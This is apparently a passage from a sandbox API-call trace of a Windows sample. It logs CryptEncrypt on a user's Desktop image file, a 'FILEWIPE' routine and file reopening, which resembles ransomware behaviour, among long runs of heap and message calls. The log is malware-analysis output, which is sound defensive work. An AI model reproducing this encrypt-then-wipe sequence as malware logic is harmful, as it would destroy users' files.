hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.959] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.959] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.960] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x53cf, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x53d0) returned 1 [0164.960] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.960] CharLowerBuffW (in: lpsz="byte[21457]", cchLength=0xb | out: lpsz="byte[21457]") returned 0xb [0164.960] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.960] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.960] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ef940*, pdwDataLen=0x87e820*=0x53cf, dwBufLen=0x53d0 | out: pbData=0x9ef940*, pdwDataLen=0x87e820*=0x53d0) returned 1 [0164.960] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.967] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0164.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.968] CryptDestroyKey (hKey=0x90aed8) returned 1 [0164.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.968] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0164.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.968] FreeLibrary (hLibModule=0x74f20000) returned 1 [0164.972] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0164.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0x90ae18 [0164.973] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0164.973] CharLowerBuffW (in: lpsz="byte[21455]", cchLength=0xb | out: lpsz="byte[21455]") returned 0xb [0164.973] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0164.973] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0164.973] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0164.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0164.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0164.974] FreeLibrary (hLibModule=0x75c90000) returned 1 [0164.974] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0164.974] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.974] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0164.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0164.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bda20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0164.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\seoboseias.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0164.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0164.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.979] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.980] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.981] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0164.982] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 